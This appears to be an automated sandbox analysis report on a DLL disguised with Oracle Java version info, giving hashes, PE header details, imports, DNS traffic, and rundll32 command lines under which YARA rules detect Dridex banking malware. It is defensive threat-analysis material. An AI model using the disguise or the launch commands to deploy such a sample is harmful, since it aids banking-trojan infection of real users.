                                                                                                                                              SHA-512:B8C58522BD6FC67DCA0BC13F4EA2870CF811B27569630BADCD84188807428E1068740C46BEE0714D0C4666647F5F8C23E0BEA08D285467A19E9750D30B39556B
                                                                                                                                              Malicious:false
                                                                                                                                              Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="975720" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERFD3D.tmp.WERInternalMetadata.xml
                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):8382
                                                                                                                                              Entropy (8bit):3.697676034716634
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:Rrl7r3GLNipbo6dQW6YRk61TNgmf8eS0Cpr089bXPsfZv9m:RrlsNipU6D6YS61TNgmf8eS9X0fC
                                                                                                                                              MD5:629236D79FB79E55D60E71CE9999CED2
                                                                                                                                              SHA1:96CAE27EA52419B01C9E8CD2FBB17B2FF0FBA6D3
                                                                                                                                              SHA-256:DB6A18CB1CD727BA3660AA5F873F3027A96B0873F287AA02F36D46DB310074CF
                                                                                                                                              SHA-512:FF51CA2ED5D7A5EBACB5A2320865AFEBE5722B9098E77C18EFF7E6B18CD9AB3D94EA683A7C5E34FB8B558248EAE9E075E33C54D4F63AFD6F3DF2A3F68257E77F
                                                                                                                                              Malicious:false
                                                                                                                                              Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.9.8.4.<./.P.i.d.>.......
                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERFD9A.tmp.dmp
                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              File Type:Mini DuMP crash report, 14 streams, Wed May 5 04:49:38 2021, 0x1205a4 type
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):39812
                                                                                                                                              Entropy (8bit):2.4677851683162455
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:Kwg9rU538iYqtTUKocLM/7VrIBlw6bihWf4nW:hgVnqKOC8HvihVW
                                                                                                                                              MD5:6E4D42CBA822457AB2C9BF76AFBD2A87
                                                                                                                                              SHA1:44E60FA16B87D126D49B2E91C22D068E9AB8D3B8
                                                                                                                                              SHA-256:408509B2CE2759EF0D66DA593008AD1B3CEC919E68EDF0973DC78B76D7398FBC
                                                                                                                                              SHA-512:E42D51468E202B349E02753A6528E1FA459C550931518EA83ECCD089DB4A219ECDCC187EBB8B343027A60FF04CB32E0FEE735E8CD5EF2BD7AE5464F7A5371C33
                                                                                                                                              Malicious:false
                                                                                                                                              Preview: MDMP....... ........#.`...................U...........B......P ......GenuineIntelW...........T....... ....#.`.............................0..=...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERFE07.tmp.dmp
                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              File Type:Mini DuMP crash report, 14 streams, Wed May 5 04:49:38 2021, 0x1205a4 type
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):41660
                                                                                                                                              Entropy (8bit):2.403405146292841
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:FWQS1jvp1XqQB15lR2khWUKocLM/7VrI4NHINYvrwxL9nn:hS1znnjFOC88kYKL9n
                                                                                                                                              MD5:3546256C4B742FB4B690D4C4B092ADBC
                                                                                                                                              SHA1:7E9842F533976E6A63C6D6AC9D1045EF989EFDA0
                                                                                                                                              SHA-256:00E7801DF84931FB42EF7F0A6484ED0A4006D480CFC41F4599C575FED5E7916E
                                                                                                                                              SHA-512:0330E441EC9268DEA42926C58981C4B69BEBD251887557E5C58B537B1FD78E25B220CC3D99997F5EC44E76D0671D66AA0BFDD38CB1B27B28C5E5F51519FED469
                                                                                                                                              Malicious:false
                                                                                                                                              Preview: MDMP....... ........#.`...................U...........B......P ......GenuineIntelW...........T............#.`.............................0..=...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERFE38.tmp.xml
                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4770
                                                                                                                                              Entropy (8bit):4.486746150131345
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:cvIwSD8zswJgtWI9CMWSC8Bm8fm8M4JCds0MF9+q8vjs0K4SrSsd:uITf25lSNBJyQKtKDWsd
                                                                                                                                              MD5:2F3A01531E832F9E3B5F3EBCA8560B49
                                                                                                                                              SHA1:7FD083A88E658EB16BA411FCE38CED19E0366C45
                                                                                                                                              SHA-256:E8FFC2A0E1438FE2CD751EC38A18A122633B002F64FACA65D83D21C05B93C7B1
                                                                                                                                              SHA-512:077CA44840F6E45262CF109B54C974479B73D3D38799540519A018B49AC171B5433212831E09FB66A4C368C51E0578527D3906366E8E03D52828A8C22FD824DC
                                                                                                                                              Malicious:false
                                                                                                                                              Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="975720" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

                                                                                                                                              Static File Info

                                                                                                                                              General

                                                                                                                                              File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                              Entropy (8bit):7.536014050371126
                                                                                                                                              TrID:
                                                                                                                                              • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.20%
                                                                                                                                              • DOS Executable Generic (2002/1) 0.20%
                                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                              File name:b8fe43e6_by_Libranalysis.dll
                                                                                                                                              File size:164864
                                                                                                                                              MD5:b8fe43e6e418db516c1deda8d2b1e8d0
                                                                                                                                              SHA1:d6901a2528977ed284f9e6808a73029371cd2ecc
                                                                                                                                              SHA256:6ea1efc4c1dd494c71fbfb23ea1fdc5530f9cbb6602993d96a74a7b014a96ee3
                                                                                                                                              SHA512:276f9e3def3a672d78128ec30c5fd48ec2946c344d0704c7f80f911f9e3f0f980b30bd486b1b1d8c15f9572f6fabeb0b7627bab785352fe80ef844632aef6ddd
                                                                                                                                              SSDEEP:3072:sk2X+QFg3UutDvUvoU8pz6EJEEhu6Tzace9kuaGA81/YXKHML/vp8AF:yG3rUvoU4JE/Wzan9T7B/CKsL/vy
                                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......t.%.0zK.0zK.0zK.0zJ.}{K...3..{K.....P{K...3..zK.V....zK...1..{K......zK.Rich0zK.........................................PE..L..

                                                                                                                                              File Icon

                                                                                                                                              Icon Hash:74f0e4ecccdce0e4

                                                                                                                                              Static PE Info

                                                                                                                                              General

                                                                                                                                              Entrypoint:0x100241a0
                                                                                                                                              Entrypoint Section:.text
                                                                                                                                              Digitally signed:false
                                                                                                                                              Imagebase:0x10000000
                                                                                                                                              Subsystem:windows gui
                                                                                                                                              Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                                                                                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                                                                                                                                              Time Stamp:0x60903ADD [Mon May 3 18:03:09 2021 UTC]
                                                                                                                                              TLS Callbacks:
                                                                                                                                              CLR (.Net) Version:
                                                                                                                                              OS Version Major:5
                                                                                                                                              OS Version Minor:0
                                                                                                                                              File Version Major:5
                                                                                                                                              File Version Minor:0
                                                                                                                                              Subsystem Version Major:5
                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                              Import Hash:f108efab351dd21acb187c36805c5bbe

                                                                                                                                              Entrypoint Preview

                                                                                                                                              Instruction
                                                                                                                                              mov edx, eax
                                                                                                                                              xor eax, eax
                                                                                                                                              add eax, 00002233h
                                                                                                                                              cmpss xmm1, xmm2, 03h
                                                                                                                                              sub eax, 00002233h
                                                                                                                                              mov edx, 00000000h
                                                                                                                                              mov edx, 00000000h
                                                                                                                                              mov edx, 00000000h
                                                                                                                                              mov edx, 00000000h
                                                                                                                                              mov edx, 00000000h
                                                                                                                                              mov edx, 00000000h
                                                                                                                                              cmpss xmm1, xmm2, 03h
                                                                                                                                              cmp eax, 01h
                                                                                                                                              mov eax, 00000000h
                                                                                                                                              mov eax, 00000000h
                                                                                                                                              mov eax, 00000000h
                                                                                                                                              mov eax, 00000000h
                                                                                                                                              mov eax, 00000000h
                                                                                                                                              mov eax, 00000000h
                                                                                                                                              mov eax, 00000000h
                                                                                                                                              mov eax, 00000000h
                                                                                                                                              mov eax, 00000000h
                                                                                                                                              mov eax, 00000000h
                                                                                                                                              mov eax, 00000000h
                                                                                                                                              mov eax, 00000000h
                                                                                                                                              mov eax, 00000000h
                                                                                                                                              mov eax, 00000000h
                                                                                                                                              mov eax, 00000000h
                                                                                                                                              mov eax, 00000000h
                                                                                                                                              mov eax, 00000000h
                                                                                                                                              mov eax, 00000000h
                                                                                                                                              mov eax, 00000000h
                                                                                                                                              mov eax, 00000000h
                                                                                                                                              mov eax, 00000000h
                                                                                                                                              mov eax, 00000000h
                                                                                                                                              mov eax, 00000000h
                                                                                                                                              mov eax, 00000000h
                                                                                                                                              mov eax, 00000000h
                                                                                                                                              mov eax, 00000000h
                                                                                                                                              mov eax, 00000000h
                                                                                                                                              mov eax, 00000000h
                                                                                                                                              mov eax, 00000000h

                                                                                                                                              Rich Headers

                                                                                                                                              Programming Language:
                                                                                                                                              • [RES] VS2012 UPD3 build 60610
                                                                                                                                              • [LNK] VS2005 build 50727
                                                                                                                                              • [EXP] VS2005 build 50727
                                                                                                                                              • [ C ] VS2012 UPD4 build 61030
                                                                                                                                              • [IMP] VS2013 UPD2 build 30501

                                                                                                                                              Data Directories

                                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x277300x55.rdata
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x278040x59.rdata
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x2c0000x3a0.rsrc
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x2d0000x1220
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x100180x38.text
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x250000x60.rdata
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                              Sections

                                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                              .text0x10000x23b140x23400False0.759010693706data7.5511794748IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                              .rdata0x250000x2ab40x2c00False0.770685369318data7.47874664505IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                              .pdata0x280000x336c0x1800False0.78564453125MMDF mailbox7.42299069747IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                              .rsrc0x2c0000x3a00x400False0.4091796875data3.06807977608IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                              .reloc0x2d0000x2580x400False0.5263671875data4.16057022331IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                              Resources

                                                                                                                                              NameRVASizeTypeLanguageCountry
                                                                                                                                              RT_VERSION0x2c0600x33cdata

                                                                                                                                              Imports

                                                                                                                                              DLLImport
                                                                                                                                              msvcrt.dllmemset
                                                                                                                                              ADVAPI32.dllRegOverridePredefKey
                                                                                                                                              ole32.dllCreatePointerMoniker, CreateStreamOnHGlobal
                                                                                                                                              USER32.dllTranslateMessage
                                                                                                                                              OPENGL32.dllglTexSubImage1D
                                                                                                                                              KERNEL32.dllCloseHandle, OutputDebugStringA, LoadLibraryExW, CreateFileW, GetProfileSectionW, LoadLibraryW, GetProfileSectionA, OpenSemaphoreW
                                                                                                                                              RASAPI32.dllRasGetConnectionStatistics
                                                                                                                                              CLUSAPI.dllClusterEnum

                                                                                                                                              Exports

                                                                                                                                              NameOrdinalAddress
                                                                                                                                              LoxmtYt10x10027776

                                                                                                                                              Version Infos

                                                                                                                                              DescriptionData
                                                                                                                                              LegalCopyrightCopyright 2018
                                                                                                                                              InternalNamej2pcsc
                                                                                                                                              FileVersion8.0.1710.11
                                                                                                                                              Full Version1.8.0_171-b11
                                                                                                                                              CompanyNameOracle Corporation
                                                                                                                                              ProductNameJava(TM) Platform SE 8
                                                                                                                                              ProductVersion8.0.1710.11
                                                                                                                                              FileDescriptionJava(TM) Platform SE binary
                                                                                                                                              OriginalFilenamej2pcsc.dll
                                                                                                                                              Translation0x0000 0x04b0

                                                                                                                                              Network Behavior

                                                                                                                                              Network Port Distribution

                                                                                                                                              UDP Packets

                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                              May 4, 2021 21:47:10.513834953 CEST5223853192.168.2.38.8.8.8
                                                                                                                                              May 4, 2021 21:47:10.562426090 CEST53522388.8.8.8192.168.2.3
                                                                                                                                              May 4, 2021 21:47:11.288100004 CEST4987353192.168.2.38.8.8.8
                                                                                                                                              May 4, 2021 21:47:11.336699009 CEST53498738.8.8.8192.168.2.3
                                                                                                                                              May 4, 2021 21:47:12.193219900 CEST5319653192.168.2.38.8.8.8
                                                                                                                                              May 4, 2021 21:47:12.242830038 CEST53531968.8.8.8192.168.2.3
                                                                                                                                              May 4, 2021 21:47:13.072216988 CEST5677753192.168.2.38.8.8.8
                                                                                                                                              May 4, 2021 21:47:13.123243093 CEST53567778.8.8.8192.168.2.3
                                                                                                                                              May 4, 2021 21:47:14.234678984 CEST5864353192.168.2.38.8.8.8
                                                                                                                                              May 4, 2021 21:47:14.294538975 CEST53586438.8.8.8192.168.2.3
                                                                                                                                              May 4, 2021 21:47:15.158169985 CEST6098553192.168.2.38.8.8.8
                                                                                                                                              May 4, 2021 21:47:15.211030006 CEST53609858.8.8.8192.168.2.3
                                                                                                                                              May 4, 2021 21:47:16.009810925 CEST5020053192.168.2.38.8.8.8
                                                                                                                                              May 4, 2021 21:47:16.068655014 CEST53502008.8.8.8192.168.2.3
                                                                                                                                              May 4, 2021 21:47:16.982290030 CEST5128153192.168.2.38.8.8.8
                                                                                                                                              May 4, 2021 21:47:17.031006098 CEST53512818.8.8.8192.168.2.3
                                                                                                                                              May 4, 2021 21:47:18.049487114 CEST4919953192.168.2.38.8.8.8
                                                                                                                                              May 4, 2021 21:47:18.098499060 CEST53491998.8.8.8192.168.2.3
                                                                                                                                              May 4, 2021 21:47:19.082519054 CEST5062053192.168.2.38.8.8.8
                                                                                                                                              May 4, 2021 21:47:19.132920027 CEST53506208.8.8.8192.168.2.3
                                                                                                                                              May 4, 2021 21:47:50.077451944 CEST6493853192.168.2.38.8.8.8
                                                                                                                                              May 4, 2021 21:47:50.228658915 CEST53649388.8.8.8192.168.2.3
                                                                                                                                              May 4, 2021 21:48:03.933945894 CEST6015253192.168.2.38.8.8.8
                                                                                                                                              May 4, 2021 21:48:03.984332085 CEST53601528.8.8.8192.168.2.3
                                                                                                                                              May 4, 2021 21:48:05.810849905 CEST5754453192.168.2.38.8.8.8
                                                                                                                                              May 4, 2021 21:48:05.859726906 CEST53575448.8.8.8192.168.2.3
                                                                                                                                              May 4, 2021 21:48:06.234451056 CEST5598453192.168.2.38.8.8.8
                                                                                                                                              May 4, 2021 21:48:06.294487000 CEST53559848.8.8.8192.168.2.3
                                                                                                                                              May 4, 2021 21:48:09.548558950 CEST6418553192.168.2.38.8.8.8
                                                                                                                                              May 4, 2021 21:48:09.600003004 CEST53641858.8.8.8192.168.2.3
                                                                                                                                              May 4, 2021 21:48:11.579992056 CEST6511053192.168.2.38.8.8.8
                                                                                                                                              May 4, 2021 21:48:11.629723072 CEST53651108.8.8.8192.168.2.3
                                                                                                                                              May 4, 2021 21:48:13.353601933 CEST5836153192.168.2.38.8.8.8
                                                                                                                                              May 4, 2021 21:48:13.404401064 CEST53583618.8.8.8192.168.2.3
                                                                                                                                              May 4, 2021 21:49:12.177429914 CEST6349253192.168.2.38.8.8.8
                                                                                                                                              May 4, 2021 21:49:12.226418018 CEST53634928.8.8.8192.168.2.3
                                                                                                                                              May 4, 2021 21:49:28.486131907 CEST6083153192.168.2.38.8.8.8
                                                                                                                                              May 4, 2021 21:49:28.536700964 CEST53608318.8.8.8192.168.2.3
                                                                                                                                              May 4, 2021 21:49:36.950227976 CEST6010053192.168.2.38.8.8.8
                                                                                                                                              May 4, 2021 21:49:37.002782106 CEST53601008.8.8.8192.168.2.3
                                                                                                                                              May 4, 2021 21:49:37.591083050 CEST5319553192.168.2.38.8.8.8
                                                                                                                                              May 4, 2021 21:49:37.641452074 CEST53531958.8.8.8192.168.2.3
                                                                                                                                              May 4, 2021 21:49:37.702224970 CEST5014153192.168.2.38.8.8.8
                                                                                                                                              May 4, 2021 21:49:37.753871918 CEST53501418.8.8.8192.168.2.3
                                                                                                                                              May 4, 2021 21:49:39.274626017 CEST5302353192.168.2.38.8.8.8
                                                                                                                                              May 4, 2021 21:49:39.324827909 CEST53530238.8.8.8192.168.2.3
                                                                                                                                              May 4, 2021 21:49:39.735467911 CEST4956353192.168.2.38.8.8.8
                                                                                                                                              May 4, 2021 21:49:39.786880016 CEST53495638.8.8.8192.168.2.3
                                                                                                                                              May 4, 2021 21:50:16.188381910 CEST5135253192.168.2.38.8.8.8
                                                                                                                                              May 4, 2021 21:50:16.240567923 CEST53513528.8.8.8192.168.2.3

                                                                                                                                              Code Manipulations

                                                                                                                                              Statistics

                                                                                                                                              CPU Usage

                                                                                                                                              Click to jump to process

                                                                                                                                              Memory Usage

                                                                                                                                              Click to jump to process

                                                                                                                                              High Level Behavior Distribution

                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                              Behavior

                                                                                                                                              Click to jump to process

                                                                                                                                              System Behavior

                                                                                                                                              General

                                                                                                                                              Start time:21:47:17
                                                                                                                                              Start date:04/05/2021
                                                                                                                                              Path:C:\Windows\System32\loaddll32.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:loaddll32.exe 'C:\Users\user\Desktop\b8fe43e6_by_Libranalysis.dll'
                                                                                                                                              Imagebase:0xdb0000
                                                                                                                                              File size:116736 bytes
                                                                                                                                              MD5 hash:542795ADF7CC08EFCF675D65310596E8
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high

                                                                                                                                              General

                                                                                                                                              Start time:21:47:18
                                                                                                                                              Start date:04/05/2021
                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\b8fe43e6_by_Libranalysis.dll',#1
                                                                                                                                              Imagebase:0xbd0000
                                                                                                                                              File size:232960 bytes
                                                                                                                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high

                                                                                                                                              General

                                                                                                                                              Start time:21:47:18
                                                                                                                                              Start date:04/05/2021
                                                                                                                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:rundll32.exe C:\Users\user\Desktop\b8fe43e6_by_Libranalysis.dll,LoxmtYt
                                                                                                                                              Imagebase:0xf90000
                                                                                                                                              File size:61952 bytes
                                                                                                                                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high

                                                                                                                                              General

                                                                                                                                              Start time:21:47:18
                                                                                                                                              Start date:04/05/2021
                                                                                                                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:rundll32.exe 'C:\Users\user\Desktop\b8fe43e6_by_Libranalysis.dll',#1
                                                                                                                                              Imagebase:0xf90000
                                                                                                                                              File size:61952 bytes
                                                                                                                                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Yara matches:
                                                                                                                                              • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000003.00000002.319669645.0000000010001000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                                                              Reputation:high

                                                                                                                                              General

                                                                                                                                              Start time:21:48:02
                                                                                                                                              Start date:04/05/2021
                                                                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4308 -s 760
                                                                                                                                              Imagebase:0x50000
                                                                                                                                              File size:434592 bytes
                                                                                                                                              MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high

                                                                                                                                              General

                                                                                                                                              Start time:21:48:09
                                                                                                                                              Start date:04/05/2021
                                                                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4872 -s 928
                                                                                                                                              Imagebase:0x50000
                                                                                                                                              File size:434592 bytes
                                                                                                                                              MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high

                                                                                                                                              General

                                                                                                                                              Start time:21:48:11
                                                                                                                                              Start date:04/05/2021
                                                                                                                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:rundll32.exe 'C:\Users\user\Desktop\b8fe43e6_by_Libranalysis.dll',DllCanUnloadNow
                                                                                                                                              Imagebase:0xf90000
                                                                                                                                              File size:61952 bytes
                                                                                                                                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Yara matches:
                                                                                                                                              • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 0000000E.00000002.508405048.0000000010001000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                                                              Reputation:high

                                                                                                                                              General

                                                                                                                                              Start time:21:48:11
                                                                                                                                              Start date:04/05/2021
                                                                                                                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:rundll32.exe 'C:\Users\user\Desktop\b8fe43e6_by_Libranalysis.dll',DllGetClassObject
                                                                                                                                              Imagebase:0xf90000
                                                                                                                                              File size:61952 bytes
                                                                                                                                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Yara matches:
                                                                                                                                              • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000010.00000002.509454632.0000000010001000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                                                              Reputation:high

                                                                                                                                              General

                                                                                                                                              Start time:21:48:11
                                                                                                                                              Start date:04/05/2021
                                                                                                                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:rundll32.exe 'C:\Users\user\Desktop\b8fe43e6_by_Libranalysis.dll',WdiAddFileToInstance
                                                                                                                                              Imagebase:0xf90000
                                                                                                                                              File size:61952 bytes
                                                                                                                                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Yara matches:
                                                                                                                                              • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000011.00000002.512489931.0000000010001000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                                                              Reputation:high

